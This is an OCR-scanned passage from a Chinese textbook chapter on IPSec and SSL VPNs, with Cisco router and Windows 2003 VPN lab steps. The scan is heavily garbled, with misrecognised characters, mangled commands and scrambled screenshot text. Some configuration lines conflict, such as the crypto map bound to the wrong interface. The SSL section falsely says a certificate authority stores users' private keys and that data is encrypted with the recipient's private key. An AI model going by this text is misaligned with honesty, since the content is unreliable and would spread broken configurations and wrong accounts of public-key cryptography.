IPSec 提供 了 3 种 不 同 的 形式 来 保护 通过 公有 或 私有 TP 网 络 传送 的 私有 数据 ,如 下 
所 述 。 
° 认证 : 可 以 确定 所 接收 的 数据 与 所 发 送 的 数据 是 一 致 的 ,同时 可 以 确定 申请 发 送 者 
在 实际 上 是 真实 发 送 者 ,而 不 是 伪装 的 。 
。 数据 完整 : 保证 数据 从 源 发 地 到 目的 地 的 传送 过 程 中 没有 任何 不 可 检测 的 数据 丢 
失 与 改变 。 
。 机 密 性 : 使 相应 的 接收 者 能 获取 发 送 的 真正 内 容 , 而 无 须 获取 数据 的 接收 者 无 法 获 
知 数 据 的 真正 内 容 。 
IPSec 利用 3 个 基本 要 素来 提供 以 上 3 种 保护 形式 ,分 别 为 认证 协议 头 (AH)、 安 全 加 
载 封 装 (ESP) 和 互联 网 密 钥 管理 协议 (IKMP)。 认 证 协议 关 和 安全 加 载 封 装 可 以 通过 分 开 
或 组 合 使 用 的 方式 来 达到 所 希望 的 保护 等 级 。 


1. 安全 协议 


安全 协议 包括 封装 安全 载荷 (ESP) 和 验证 头 (AH)。 它 们 既 可 用 来 保护 一 个 完整 的 IP 
载荷 , 亦 可 用 来 保护 某 个 IP 载荷 的 上 层 协议 。 这 两 方面 的 保护 分 别 是 由 IPSec 的 两 种 不 同 
的 实现 模式 来 提供 的 ,如 图 4-1 所 示 。 传 送 模 式 用 来 保护 上 层 协议 ; 隧道 模式 用 来 保护 整 
个 IP 数据 报 。 在 传送 模式 中 ,IP 头 与 上 层 协议 之 间 需 插入 一 个 特殊 的 IPSec 3k; 而 在 隧 
道 模式 中 ,要 保护 的 整个 IP 包 都 需 封装 到 另 一 个 TP 数据 报 里 ,同时 在 外 部 与 内 部 IP 头 之 
间 插 入 一 个 IPSec 头 。 两 种 安全 协议 均 能 以 传送 模式 或 隧道 模式 工作 。 
初始 数据 报 
IP% | ]PSec 头 TCP% | 数据 
传送 模式 下 经 TPSec 处 理 后 的 数据 报 格式 
外 层 IP 头 | meseex | AIPA | Terk 数据 
隧道 模 代 下 经 IPSes 处 理 后 的 数据 报 向 区 
图 4-1 两 种 模式 下 的 数据 报 格式 


封装 安全 载荷 (Encapsulating Security Payload,ESP) 是 IPSec 的 一 种 安全 协议 , 它 可 
确保 IP 数据 报 的 机 密 性 .数据 的 完整 性 以 及 对 数据 源 的 身份 验证 。 此 外 , 它 也 能 负责 对 重 
放 攻击 的 抵抗 。 具 体 做 法 是 在 IP 头 ( 以 及 任何 选项 ) 之 后 、 要 保护 的 数据 之 前 插入 一 个 新 
头 , 即 ESP 头 , 受 保护 的 数据 可 以 是 一 个 上 层 协议 ,或 者 是 整个 IP 数据 报 , 最 后 还 要 在 后 面 
追加 一 个 ESP Æ ,格式 如 图 4-2 所 示 。ESP 是 一 种 新 的 协议 , 它 通 过 TP 头 的 协议 字段 进行 
标识 ,假如 它 的 值 为 50, 就 表明 这 是 一 个 ESP 包 , 而 且 紧 接 在 IP 头 后 面 的 是 一 个 ESP k, 


IP 头 ESP 头 ”要 保护 的 数据 ESP Æ 


图 4-2 一 个 受 ESP 保护 的 IP & 


验证 头 (Authentication Header. AH) j ESP 类 似 , 也 提供 了 数据 完整 性 、 数 据 源 验证 
以 及 抗 重 放 攻 击 的 能 力 。 但 要 注意 , 它 不 能 用 来 保证 数据 的 机 密 性 。 正 是 由 于 这 个 原因 ， 
AH It ESP 简单 得 多 ,AH 只 有 头 ,而 没有 尾 , 格 式 如 图 4-3 所 示 。 


IP X AH X 要 保护 的 数据 


图 4-3 一 个 受 AH 保护 的 IP 包 
2. 密 钥 管理 


密 钥 管理 包括 密 钥 确 定 和 密 钥 分 发 两 个 方面 ,最 多 需要 4 个 密 钥 ,包括 AH 和 ESP 各 
两 个 发 送 和 接收 密 钥 。 密 钥 本 身 是 一 个 二 进 制 字符 串 , 通 常用 十 六 进 制 表示 。 密 钥 管 理 
包括 手工 和 自动 两 种 方式 。 人 工 手 动 管理 方式 是 指 管 理 员 使 用 自己 的 密 钥 及 其 他 系统 
的 密 钥 手 工 设置 每 个 系统 ,这 种 方法 在 小 型 网 络 环境 中 使 用 比较 实际 。 自 动 管理 系统 能 
满足 其 他 所 有 应 用 要 求 ,使 用 自动 管理 系统 ,可 以 动态 地 确定 和 分 发 密 钥 。 自 动 管理 系 
统 具 有 一 个 中 央 控 制 点 ,集中 的 密 钥 管理 者 可 以 令 自己 更 加 安全 .最 大 限度 地 发 挥 IPSec 
的 效用 。 


4.2.2 IPSec 的 实现 方式 


IPSec 的 一 个 最 基本 的 优点 是 它 可 以 在 共享 网 络 访问 设备 ,甚至 是 所 有 主机 和 服务 器 
上 完全 实现 ,这 很 大 程度 避免 了 升级 任何 网 络 相关 资源 的 需要 。 在 客户 端 ,IPSec 架构 允许 
使 用 在 远程 访问 介入 路 由 器 或 基于 纯 软 件 方式 使 用 普通 Modem 的 PC 机 和 工作 站 。 通 过 
传送 模式 和 隧道 模式 两 种 模式 在 应 用 上 提供 了 更 多 的 弹性 。 

当 ESP 在 一 台 主 机 (客户 机 或 服务 器 ) 上 实现 时 通常 使 用 传输 模式 ,传输 模式 使 用 原始 
明文 IP 头 , 并 且 只 加 密 数 据 , 包 括 它 的 TCP 和 UDP 头 。 

当 ESP 在 关联 多 台 主 机 的 网 络 访问 介入 装置 实现 时 通常 使 用 隧道 模式 ,隧道 模式 处 理 
整个 外包 ,包括 全 部 TCP/IP s UDP/IP 头 和 数据 , 它 用 自己 的 地 址 做 为 源 地 址 加 入 新 的 
IP 头 。 当 隧道 模式 用 在 用 户 终端 设置 时 , 它 可 以 提供 更 多 的 便利 来 隐藏 内 部 服务 器 主机 和 
客户 机 的 地 址 。 隧 道 模式 被 用 在 两 端 或 一 端 是 安全 网 关 的 架构 ,例如 装 有 IPSec 的 路 由 器 
或 防火 墙 , 使 用 了 隧道 模式 ,防火 墙 内 很 多 主机 不 需要 安装 IPSec 也 能 安全 地 通信 。 这 些 主 
机 所 生成 的 未 加 保护 的 网 包 经 过 外 网 ,使 用 隧道 模式 的 安全 组 织 规定 ( 即 SA ,发 送 者 与 接 
收 者 之 间 的 单 向 关系 ,定义 装 在 本 地 网 络 边缘 的 安全 路 由 器 或 防火 墙 中 的 IPSec 软件 IP 交 
换 所 规定 的 参数 ) 传 输 。 

举 一 个 隧道 模式 的 IPSec 运作 的 例子 。 某 网 络 的 主机 甲 生成 一 个 IP 包 ,目的 地 址 是 另 
一 个 网 中 的 主机 乙 。 这 个 包 从 起 始 主机 发 送 到 主机 甲 的 网 络 边缘 的 安全 路 由 器 或 防火 墙 。 
防火 墙 把 所 有 出 去 的 包 过 滤 ,看 看 有 哪些 包 需 要 进行 IPSec 的 处 理 。 如 果 这 个 从 甲 到 乙 的 
包 需 要 使 用 IPSec, 防 火 墙 就 进行 IPSec 的 处 理 , 并 把 网 包 打 包 , 添 加 外 层 IP 包头 。 这 个 外 
层 包头 的 源 地 址 是 防火 墙 ,而 目的 地 址 可 能 是 主机 乙 的 网 络 边 缘 的 防火 墙 。 现 在 这 个 包 被 
传送 到 主机 乙 的 防火 墙 ,中 途 的 路 由 器 只 检查 外 层 的 IP 包头 。 最 后 主机 乙 网 络 的 防火 墙 会 


实践 


把 外 层 IP 包头 除 掉 , 把 IP 内 层 发 送 到 主机 乙 去 。 


4.3 SSL 安全 传输 技术 
4.3.1 SSL 简介 


SSL(Secure Sockets Layer) E: fH Netscape 公司 开发 的 一 套 Internet 数据 安全 协议 , 当 
前 版 本 为 3.0。 它 已 被 广泛 地 用 于 Web 浏览 器 与 服务 器 之 间 的 身份 认证 和 加 密 数据 传输 。 
SSL VPN 通过 SSL 协议 ,利用 PKI 的 证 书 体系 ,在 传输 过 程 中 使 用 DES.3DES、AES、 
RSA.MD5 X SHA1 等 多 种 密码 算法 保证 数据 的 机 密 性 、 完 整 性 \ 不 可 否认 性 ,完成 秘密 传 
输 ,实现 在 Internet 上 进行 安全 的 信息 交换 。 因 为 SSL VPN 具备 很 强 的 灵活 性 ,因而 广 受 
欢迎 ,如 今 所 有 浏览 器 都 内 建 SSL 功能 , 它 正 成 为 企业 应 用 ,无 线 接 入 设备 、Web 服务 以 及 
安全 接 入 管理 的 关键 协议 。SSL 协议 层 包 含 两 类 子 协 议 一 一 SSL 握手 协议 和 SSL 记录 协 
议 ,它们 共同 为 应 用 访问 连接 提供 认证 ,加密 和 防 算 改 功能 。SSL 协议 位 于 TCP/IP 协议 与 
各 种 应 用 层 协议 之 间 , 能 在 TCP/IP 和 应 用 层 间 无 缝 实现 Internet 协议 栈 处 理 ,为 数据 通信 
提供 安全 支持 ,而 不 对 其 他 协议 层 产 生 任何 影响 。 


4.3.2 SSL 运作 过 程 


SSL 目前 使 用 一 种 名 为 Public Key 加 密 的 方式 ,使 用 两 个 Key 值 ,一 个 为 公众 值 
(Public Key) , 男 一 个 为 私有 值 (Private Key) ,在 整个 加 解密 过 程 中 ,这 两 个 Key 均 会 用 到 。 
要 使 用 这 种 加 解密 功能 之 前 ,首先 需要 构建 一 个 认证 中 心 CA, 这 个 认证 中 心 专门 存放 每 一 
位 使 用 者 的 Public Key Private Key, 并 且 每 一 位 使 用 者 必须 自行 建 置 资料 于 认证 中 心 。 
当 甲 使 用 端 要 传送 资料 给 乙 用户 端 ,并 且 和 希望 传送 的 过 程 必须 加 以 保密 , 则 甲 用 户 端 和 乙 用 
户 端 都 必须 向 认证 中 心 申请 一 对 加 解密 专用 键 值 (Key) ,之 后 甲 用 户 端 再 传送 资料 给 乙 用 
户 端 时 先 向 认证 中 心 索取 乙 用 户 端的 Public Key 及 Private Key .然后 利用 加 密 演算 法 将 资 
料 与 乙 用 户 端的 Private Key 重新 组 合 。 当 资料 送 到 乙 用 户 端 时 , 乙 用 户 端 也 会 以 同样 的 
方式 到 认证 中 心 取得 乙 用 户 端 自己 的 键 值 (Key) ,然后 再 利用 解密 演算 法 将 收 到 的 资料 
与 自己 的 Private Key 重新 组 合 , 则 最 后 产生 的 就 是 甲 用 户 端 传送 过 来 给 乙 用 户 端 的 原始 
资料 。 

首先 ,使 用 者 的 网 络 浏览 器 必须 使 用 http 的 通信 方式 连接 到 网 站 服务 器 。 如 果 所 进入 
的 网 页 内 容 有 安全 控制 管理 ,此 时 认证 服务 器 会 传送 公开 密 钥 给 网 络 使 用 者 。 使 用 者 收 到 
这 组 密 钥 之 后 ,产生 解码 用 的 对 称 密 钥 ,将 公开 密 钥 与 对 称 密 钥 进 行 数学 计算 ,原文 件 内 容 
变 成 一 篇 充满 乱码 的 文章 ,最 后 将 这 篇 充满 乱码 的 文件 传送 回 网 站 服务 器 。 网 站 服务 器 利 
用 服务 器 本 身 的 私 用 密 匙 对 由 浏览 器 传 过 来 的 文件 进行 解密 ,如 此 即 可 取得 浏览 器 所 产生 
的 对 称 密 匙 。 自 此 以 后 ,网 站 服务 器 与 用 户 端 浏览 器 之 间 所 传送 的 任何 资料 或 文件 , 均 会 以 
此 对 称 密 匙 进行 文件 的 加 解密 运算 动作 。 


4.3.3 SSL VPN 的 特点 


SSL VPN 控制 功能 强大 ,能 方便 公司 实现 更 多 远程 用 户 在 不 同 地 点 远程 接 人 ,实现 更 
多 网 络 资源 访问 , 且 对 客户 端 设备 要 求 低 , 因 而 降低 了 配置 和 运行 支持 成 本 。 很 多 企业 用 户 
采纳 SSL VPN 作为 远程 安全 接 入 技术 ,主要 看 重 的 是 其 接 入 控制 功能 。SSL VPN 提供 安 
全 的 可 代理 连接 ,只 有 经 认证 的 用 户 才能 对 资源 进行 访问 。SSL VPN 能 对 加 密 隧道 进行 细 
分 ,从 而 使 得 终端 用 户 能 够 同时 接 入 Internet 和 访问 内 部 企业 网 资源 ,也 就 是 说 它 具备 可 
控 功 能 。 另 外 ,SSL VPN 还 能 细 化 接 入 控制 功能 ,易于 将 不 同 访问 权限 赋予 不 同 用 户 , 实 
现 伸 缩 性 访问 ; 这 种 精确 的 接 入 控制 功能 对 远程 接 入 IPSec VPN 来 说 几乎 是 不 可 能 实 
现 的 。 

SSL VPN 基本 上 不 受 接 和 人 位 置 的 限制 ,可 以 从 众多 Internet 接 和 人 设备 .任何 远程 位 置 
访问 网 络 资源 。SSL VPN 通信 基于 标准 TCP/UDP 协议 传输 ,因而 能 遍历 所 有 NAT 设 
备 . 基 于 代理 的 防火 墙 和 状态 检测 防火 墙 。 这 使 得 用 户 无 论 是 处 于 其 他 公司 网 络 中 基于 代 
理 的 防火 墙 之 后 ,或 是 宽带 连接 中 ,都 能 够 接 入 。 随 着 远程 接 入 需求 的 不 断 增 长 ,SSL VPN 
是 实现 任意 位 置 远程 安全 接 人 的 理想 选择 。 


4.4 SSL VPN 与 IPSec VPN 技术 比较 


SSL VPN 网 关 作为 一 种 新 兴 的 VPN 技术 ,与 传统 的 IPSec VPN 技术 相 比 各 具 特 色 ， 
各 有 千秋 。SSL VPN 比较 适合 用 于 移动 用 户 的 远程 接 入 (Client-Site) ,而 IPSec VPN 则 在 
网 对 网 (Site-Site) 的 VPN 连接 中 具备 先天 优势 。 这 两 种 技术 将 长 期 共存 ,优势 互补 。 

在 表现 形式 上 ,两 者 主要 有 以 下 几 大 差异 。 

* IPsec VPN 多 用 于 “网 -网 ”连接 ,SSL VPN 用 于 “移动 客户 -网 ”连接 。SSL VPN 的 
移动 用 户 使 用 标准 的 浏览 器 ,无 须 安装 客户 端 程序 , 即 可 通过 SSL VPN 隧道 接 入 内 
部 网 络 ; 而 IPSec VPN 的 移动 用 户 需 要 安装 专门 的 IPSec 客户 端 软件 。 

SSL VPN 是 基于 传输 层 的 VPN,IPsec VPN 是 基于 网 络 层 的 VPN。IPsec VPN 对 
所 有 IP 应 用 均 透 明 ; SSL VPN 基于 Web 的 应 用 更 有 优势 ,好 的 产品 也 支持 TCP/ 
UDP 的 C/S 应 用 ,例如 文件 共享 、 网 络 邻 居 、Ftp、Telnet 及 Oracle 等 。 

SSL VPN 用 户 不 受 上 网 方式 限制 ,SSL VPN 隧道 可 以 穿 透 防火 墙 ; IPSec 客户 端 
需要 支持 “NAT 穿 透 功能 才能 穿 透 防火 墙 。 

SSL VPN 只 需要 维护 中 心 节 点 的 网 关 设 备 , 客 户 端 免 维 护 , 降 低 了 部 署 和 支持 费 
JH. IPSec VPN 需要 管理 通信 的 每 个 节点 ,网 管 专业 性 较 强 。 

SSL VPN 更 容易 提供 访问 控制 ,可 以 对 用 户 的 权限 、 资 源 、 服 务 ,文件 进行 更 加 细致 
的 控制 ,与 第 三 方 认证 系统 (如 radius, AD 等 ) 结 合 更 加 便捷 。IPSec VPN 主要 基于 
IP 五 元 组 对 用 户 进行 访问 控制 。 

正 是 出 于 SSL VPN 的 这 些 独 特 优势 ,SSL VPN 越 来 越 被 一 些 客户 所 接受 。 

随 着 互联 网 技术 的 发 展 ,基于 互联 网 的 安全 传输 技术 得 到 了 进一步 完善 ,而 更 新 的 技术 
也 在 不 断 推出 。 但 毫 无 疑问 ,IPSec 与 SSL 技术 是 应 用 最 为 广泛 的 技术 ,它们 各 有 优势 , 共 


实践 


同 为 各 行 各 业 提供 了 一 种 低 成 本 \ 高 可 靠 性 的 安全 传输 方式 ,促进 了 全 社会 信息 网 络 化 \ 办 
公 自 动 化 的 发 展 。 


【实验 4-1] | 构建 VPN 


本 实验 的 拓扑 图 如 图 4-4 所 示 。 


192.168.1.254_ exa pa 216822 
= Internet 
o 192.168.2.1 
PCI(server) PC2 
图 4-4 拓扑 图 


【实验 4-1-1】 IPSec VPN 实验 。 

【实验 目的 】 

掌握 IPSec VPN 原理 ; 掌握 site-to-site VPN 配置 ; 在 R1、R2 间 配 置 site-to-site 
VPN ,对 192. 168. 1. 0/24 和 192. 168. 2. 0/24 网 段 数据 进行 加 密 。 

IPSec 配置 参数 如 表 4-1 所 示 。 


表 4-1 IPSec 配置 参数 
IKE policy isakmp key 转 换 集 


加 密 算法 : 3DES; 

险 希 算法 : MessageDigest 5; 
认证 方式 : Pre-Shared Key; 
Diffie-Hellman 组 #2 (1024 bit) 


载荷 加 密 算法 : esp-3des; 
cisco 载荷 散 列 算法 : esp-sha-hmac; 
认证 头 : ah-sha-hmac; 


【实验 步骤 】 
(1) 按照 实验 拓扑 ,对 路 由 器 .PC 机 进行 基本 配置 ,保证 底层 网 络 互 通 。 
R1 的 基本 配置 : 


Router > en 

Route # conf t 

Router(config) # hostname R1 

Ri(config) # int £0/0 

Rl(config- if) £ ip address 192. 168. 1. 254 255.255.255.0 
Rl(config- if) # no shutedown 

Rl(config- if) # int s1/0 

Rl(config- if) # ip address 61.1.1.1 255.0.0.0 
Rl(config- if) # clock rate 64000 

Rl(config- if) # no shutdown 

Rl(config- if) # exit 

Ri(config)£ ip route 0.0.0.0 0.0.0.0 61.1.1.2 


R2 的 基本 配置 : 


Router > en 

Route# conf t 

Router(config) # hostname R2 

R2(conf ig) # int f0/0 

R2(config- if) # ip address 192.168.2 .2 255.255.0.0 
R2(config- if) # no shutedown 

R2(config- if) # int s1/0 

R2(config- if) # ip address 61.1.1.2 255.0.0.0 
R2(config- if) # clock rate 64000 

R2(config- if) # no shutdown 

R2(config- if) # exit 


PC1 的 IP 地 址 设 为 192. 168. 1. 1 ,网 关 设 为 192. 168. 1. 254. 
PC2 的 IP 地 址 设 为 192. 168. 2. 1 ,网 关 设 为 192. 168. 2. 2 。 
(2) 对 R1 进行 IPSec 配置 。 

配置 密 钥 交换 策略 代码 如 下 。 

R1(config) # crypto isakmp policy 10 

Ri(config- isakmp) # authentication pre — share 

Rl(config- isakmp) # hash md5 

Ri(config- isakmp) # group 2 


Ri(config- isakmp) # encryption 3des 
Rl(config- isakmp) # exit 


配置 预 共 享 密 钥 ,代码 如 下 。 

R1(config) # crypto isakmp key 6 cisco address 61.1.1.2 

配置 加 密 转 换 集 myset, 代 码 如下。 

R1(conf ig) # crypto ipsec transform- set myset esp- 3des esp- sha - hmac ah- sha - hnac 

配置 访问 控制 列表 ,定义 兴趣 流量 ,对 192. 168. 1.0/24 到 192. 168. 2. 0/24 的 网 络 数据 
进行 加 密 , 代 码 如 下 。 


R1(conf ig) # access - list 100 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 
配置 加 密 映 射 图 , 绑 定 接口 ,代码 如 下 。 


R1(config) # crypto map mymap 10 ipsec - isakmp 
Rl(config- crypto- map) # match address 100 
Ri(config- crypto- map) # set transform- set nyset 
Rl(config- crypto- map) # set peer 61.1.1.2 
Rl(config- crypto- map) # end 

Ri(config) # int s1/1 

Ri(config- if) # crypto map mymap 


(3) 对 R2 进行 IPSec 配置 。 
配置 密 钥 交换 策略 ,代码 如 下 。 


R2(config) # crypto isakmp policy 10 
R2(config- isakmp) # authentication pre - share 


实践 


R2(config- isakmp) # hash md5 

R2(config- isakmp) # group 2 

R2(config- isakmp) # encryption 3des 

R2(config- isakmp) # exit 

配置 预 共享 密 钥 ,代码 如 下 。 

R2(config) # crypto isakmp key 6 cisco address 61.1.1.1 
配置 加 密 转 换 集 myset, 代 码 如 下 。 


R2(config) # crypto ipsec transform - set myset esp- 3des esp- sha - hmac 


配置 访问 控制 列表 ,定义 兴趣 流量 ,对 192. 168. 2.0/24 到 192. 168. 1. 0/24 的 网 络 数据 
进行 加 密 , 代 码 如 下 。 


R2(config) # access — list 100 permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255 
配置 加 密 映 射 图 , 绑 定 接口 ,代码 如 下 。 


R2(config) # crypto map mymap 10 ipsec - isakmp 
R2(config - crypto- map) # match address 100 
R2(config- crypto- map) # set transform- set myset 
R2(config- crypto- map) # set peer 61.1.1.1 
R2(config- crypto- map) # exit 
R2(config) # int s1/0 
R2(config- if) # crypto map mymap 
(4) 使 用 ping 命令 从 PCI ping PC2 ,测试 连通 性 。ping 通 后 使 用 命令 show crypto 
isakmp peers 查看 建立 的 对 等 体 连 接 。 
IPSec VPN 常用 查看 命令 如 下 。 
。 show crypto map: 查看 加 密 映 射 图 。 
show crypto isakmp policy; 查看 密 钥 交 换 策略 。 
show crypto isakmp key: 查看 当前 密 钥 交换 方式 所 使 用 的 密 钥 。 
show crypto isakmp peers: 查看 已 建立 的 对 等 体 。 
show crypto isakmp sa: 查看 安全 关联 。 
show crypto ipsec transform-set: 查看 IPSec 加 密 转换 集 。 
【实验 4-1-2】 SSL VPN 实验 
【实验 目的 】 
掌握 SSL VPN 原理 ; 掌握 SSL VPN 配置 ; 在 R1、R2 间 配 置 SSL. VPN. 
【实验 步骤 】 
(1) [i] IPSec 步骤 一 。 
(2) 安装 配置 tftp 
本 实验 前 提 是 为 VPN 网 关连 接 安装 SSL VPN Client 软件 。 
(D 安装 tftp. 
Q) 设置 tftp 目录 。 


@ 设置 网 关 。 


format disk0: 

copy tftp disk0: 

192.168.1.1 

Sslclient - win - 1.1.3.173. pkg 


@ 安装 SVC 软件 。 
R1(config) # webvpn install svc flash:/sslclient - win 一 1.1.3.173.pkg 
© X. AAA. 


Ri(config) # aaa new - model 
Rl(config) aaa authentication login vpn authen local 
Rl(config) # username cisco password cisco 


启用 webvpn, 产 生 自 签名 证 书 。 


R1(conf ig) # webvpn gateway vpn gateway 

Rl(config- webvpn- gateway) # ip address 61.1.1.1 port 443 
R1(conf ig — webvpn- gateway) # inservice 

R1(conf ig - webvpn — gateway) # iexit 


@ 定义 IP 地 址 池 。 
R1(config) # ip local pool vpn pool 172.16.1.1 172.16.1.10 
(& 建立 webvpn 环境 。 


Rl(config) # webvpn context vpn context 

Ri(config- webvpn- context) # gateway vpn gateway domain groupl 
R1(conf ig - webvpn- context) # aaa authentication list vpn authen 
R1(conf ig - webvpn- context) # inservice 

R1(conf ig - webvpn- context) # exit 


@ 定义 组 策略 。 


R1(conf ig) # webvpn context vpn context 

Rl(config- webvpn- context) # policy group vpn group policy 

Rl(config- webvpn- groupt) # functions svc - enabled 

R1(conf ig — webvpn- groupt) # svc address - pool vpn pool 

Rl(config- webvpn- groupt) # svc split include 192.168.1.0 255.255.255.0 
R1(conf ig — webvpn- groupt) # exit 

Rl(config- webvpn- context) # default - group- policy vpn group policy 


配置 VPN 服务 器 


【实验 目的 】 
基于 Windows 2003, 通 过 ADSL 接 入 Internet 的 服务 器 和 客户 端 ,连接 方式 为 客户 端 
通过 Internet 与 服务 器 建立 VPN 连接 。 


实践 


【实验 环境 】 
VPN 服务 器 需要 两 块 网 卡 , 一 个 连 入 内 网 ,一 个 连 入 外 网 。 
* Authentication( 验 证 ): 设置 哪些 用 户 可 以 通过 VPN 访问 服务 器 资源 。 在 DC 上 做 


身份 验证 。 
* Authorization BO ; 检查 客户 端 是 否 可 以 拨 入 服务 器 ,是 否 符合 拨 入 条 件 ( 时 间 、 
苏 议 …… ) 
【实验 步骤 】 3 路 由 和 远程 访问 E =la x| 
1) 配置 VPN 服务 器 文件 四 ”操作 (各 ”查看 WW MHN 
(D 安装 * 路 由 和 远程 访问 "功能 ,或 者 运行 [e [edm Ix S OO m 
命令 rrasmgmt. msc 后 在 弹出 的 “路 由 和 远程 访 dus TE 


问 ? 管 理 控制 台 窗口 中 单 击 配置 并 启用 路 由 和 远 
程 访问 ,如 图 4-5 所 示 。 

(2) 弹出 * 路 由 和 远程 访问 服务 器 安装 向 导 ” 
Xp RE , 单 击 * 下 一 步 ? 按 钮 进入 "配置 ?界面 ,选择 
自 定义 配置 ,如 图 4-6 所 示 。 

(3) 在 * 自 定义 配置 "界面 中 色 选 “VPN 访 
问 ? 复 选 框 , 单 击 “ 下 一 步 ? 按 钮 ,如 图 4-7 所 示 o 


路 由 和 运程 访问 服务 器 安装 向 导 


配置 ai 
您 可 以 局 用 下 列 服 务 的 任意 组合 ,或 者 您 可 以 目 定义 此 服务 器 。 gr d 


C 远程 访问 ASR ve qo 
fige manm 或 安全 的 谍 拟 专用 网 络 (YPN) Internet 连接 来 连接 到 


C 网络 地 址 转 执 ONAT) 
ORBEPHER aA IP 地 址 连接 到 Internet. 


C 虚拟 专用 网 络 WFD 访问 和 IAT 
cus C 本 地 客户 端 便 用 一 个 单一 的 


《上 一 步 @) 取消 


图 4-6 选择 自 定义 配置 


(4) 在 进入 的 界面 中 单 击 “ 完 成 ”按钮 ,弹出 “路 由 和 远程 访问 ”对 话 框 , 单 击 “ 是 ”按钮 ， 
如 图 4-8 所 示 。 

(5) VPN 服务 成 功 启 动 。 右 击 服务 器 名 称 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 
弹出 的 对 话 框 中 切换 到 IP 选项 卡 .在 “IP 地 址 指派 ”选项 组 中 选中 “静态 地 址 池 ” 单 选 按 钮 ， 
单 击 “ 添 加 ”按钮 ,如 图 4-9 所 示 。 

(6) 弹出 “新 建 地 址 范围 ”对 话 框 ,在 “起 始 IP 地 址 ”和 “结束 IP 地 址 "文本 框 中 输入 P 


路 由 和 运程 访问 服务 


m- 


自 定义 配置 
关闭 此 向 导 后 ,您 可 以 在 路 由 和 运程 访问 控制 台中 配置 迁 择 的 服务 。 


图 4-7 启用 VPN 访问 


路 由 和 运程 访问 
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D 


图 4-8 ”确定 开始 服务 
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图 4-9 选择 静态 地 址 池 


实践 
地 址 , 单 击 “确定 ”按钮 ,如 图 4-10 所 示 。 
AER P ik , MER cr 地 址 或 范 园 中 的 地 址 数 。 


të rp 地 址 G) ESEE 1.1 
s TP 地址 EE) pe 168. 1 .100 
Ln 


| — n 


图 4-10 设置 地 址 范围 


GERI 使 用 静态 IP 地 址 池 为 客户 端 分 配 IP 地 址 可 以 减少 TP 地 址 解析 时 间 ,提高 连 
接 速 度 。 起 始 IP 地 址 和 结束 IP 地 址 可 以 自 定义 一 段 耳 地 址 (如 192. 168. 0. 10 至 192. 
168.0. 50) ,如 这 台 主 机 已 经 配置 了 DHCP 服务 ,也 可 以 选择 动态 主机 配置 协议 (DHCP)， 
但 会 延长 连接 时 间 , 如 图 4-11 所 示 。 


图 4-11 选择 动态 配置 


(7) 返回 属性 对 话 框 ,依次 单 击 “ 确 定 ” 按 钮 ,完成 初步 配置 操作 。 

GERI 如 果 服 务 器 端 有 固定 的 IP 地 址 , 则 客户 端 可 随时 与 服务 器 建立 VPN 连接 。 
如 果 服 务 器 采用 ADSL 拨号 方式 接 入 Internet, 则 需要 在 每 次 更 改 IP 地 址 后 通知 客户 端 ， 
或 者 申请 动态 域名 解析 服务 。 

2) 赋予 用 户 远程 连接 的 权限 

出 于 安全 考虑 ,VPN 服务 器 配置 完成 以 后 所 有 用 户 均 被 拒绝 氢 入 服务 (初始 状态 ) , 因 
此 需要 为 指定 用 户 赋予 拨 入 权限 ,操作 步骤 如 下 。 

(1) VPN 服务 器 中 右 击 “ 我 的 电脑 ”图标 , 在 弹出 的 快捷 菜单 中 选择 “管理 ”命令 ,如 
图 4-12 所 示 。 


(2) 弹出 “计算 机 管理 ”窗口 ,展开 “本 地 用 户 和 组 ”选项 ,选中 
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“用 户 ” 项 ,如 图 4-13 所 示 。 
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图 4-12 选择 命令 


图 4-13 选择 用 户 


(3) 如 果 计 算 机 加 入 了 域 , 则 单 击 AD 用 户 和 计算 机 中 的 Users 组 中 的 用 户 , 右 击 用 户 


选项 后 选择 “属性 ”命令 ,如 图 4-14 所 示 。 
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图 4-14 


“属性 "命令 


(4) 打开 “test 属性 ”对 话 框 ,切换 到 “ 拨 入 ”选项 卡 ,在 “远程 访问 权限 ”选项 组 中 选中 


“允许 访问 ” 单 选 按钮 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 4-15 Bron o 
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图 4-15 


"test 属性 ”对 话 框 


实践 


【提示 】 如 果 域 功能 级 别 为 Windows 2000 混合 模式 , 则 “通过 远程 访问 策略 控制 访 
问 ” 选 项 不 可 选 ,提升 域 功能 级 别 即 可 。 

3) 客户 端 创建 VPN 连接 

客户 端 配 置 比较 简单 ,只 需 建 立 一 个 VPN 的 专用 连接 即 可 。 

假设 客户 端 已 建立 了 一 个 接 入 Internet 的 ADSL 连接 ,创建 VPN 连接 的 步骤 如 下 所 述 。 

CD 右 击 “网 上 邻居 ”图 标 后 选择 “属性 "命令 ,打开 “网 络 连 接 ” 窗 口 。 选 择 “ 文 件 ”>“ 新 
建 连接 ”命令 ,如 图 4-16 所 示 。 
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图 4-16 选择 命令 
(2) 弹出 “新 建 连接 向 导 ” 对 话 框 , 单 击 " 下 一 步 " 按 钮 进入 “网 络 连 接 类 型 "界面 ,选中 
“连接 到 我 的 工作 场所 的 网 络 " 单 选 按钮 ,然后 单 击 “ 下 一 步 ” 按 钮 ,如 图 4-17 所 示 。 
PERAS Ki 


ig 777 e» 


C 连接 到 Internet C) 
Internet , 这样 您 就 可 以 浏览 Web 或 阅读 电子 邮件 。 
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图 4-17 选择 网 络 连接 类 型 


(3) 弹出 “网络 连接 ”界面 ,选中 * 虚 拟 专用 网 络 连接 ” 单 选 按钮 后 单 击 * 下 一 步 按 钮 ,如 
图 4-18 所 示 。 

Dg] 如 果 是 第 一 次 建立 连接 ,系统 会 要 求 输入 所 在 地 区 的 电话 区 号 。 如 果 在 建立 
VPN 连接 前 已 经 建立 了 其 他 连接 (如 ADSL 接 入 Internet 的 连接 ) , 则 不 会 出 现 该 提示 。 

(4) 进入 “连接 名 ”界面 ,在 “公司 名 ”文本 框 中 输入 连接 名 称 (连接 到 sungh. com W), 
然后 单 击 “下 一 步 ? 按 钮 ,如 图 4-19 所 示 。 


图 4-19 设置 连接 名 


(5) 3E A" VPN 服务 器 选择 ”界面 ,设置 主机 名 或 者 IP 地 址 ,然后 单 击 * 下 一 步 ? 按 钮 ， 
如 图 4-20 所 示 。 

(6) 进入 “可 用 连接 ”界面 ,选中 “只 是 我 使 用 ” 单 选 按 钮 后 单 击 " 下 一 步 ”按钮 ,如 图 4-21 
所 示 。 
